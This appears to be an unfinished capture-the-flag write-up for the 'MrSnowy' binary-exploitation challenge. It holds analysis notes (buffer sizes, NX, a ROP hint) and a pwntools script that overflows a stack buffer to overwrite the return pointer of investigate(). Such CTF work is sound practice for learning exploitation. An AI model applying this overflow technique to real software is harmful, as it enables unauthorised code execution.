# MrSnowy

There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house. Something must be wrong with him.

## Flag

## Progress so far

- `read()` reads 0x108 bytes
- The stack frame has a size of 0x40 bytes
- `checksec --file=mrsnowy` reports NX being enabled
  - So no shellcode will be placeable unless there is executable space
  - This hints at ROP chaining
- The binary should be patched to get rid of the time-consuming animation
  - Just `nop` the `banner()` function call
- Overwriting the return pointer of `investigate()`:

```python
from pwn import *
import ipdb

context(arch='x86_64', os='linux')
context.terminal = ['/usr/bin/alacritty', '-e']

e = ELF("mr_snowy")
p = process(e.path)


def do_read():
    # consume output until the menu prompt ('>') shows up
    while True:
        ll = p.read()
        print(ll)
        if b'>' in ll:
            break


# if not patched, wait for the animation, then send 1
do_read()
p.sendline(b'1')
do_read()

# write 0x48 bytes (0x40 stack frame + 8 bytes saved rbp) and overwrite
# the return pointer with the top of the stack frame
p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))

# start the python debugger to get a coredump which is loadable by gdb
ipdb.set_trace()
```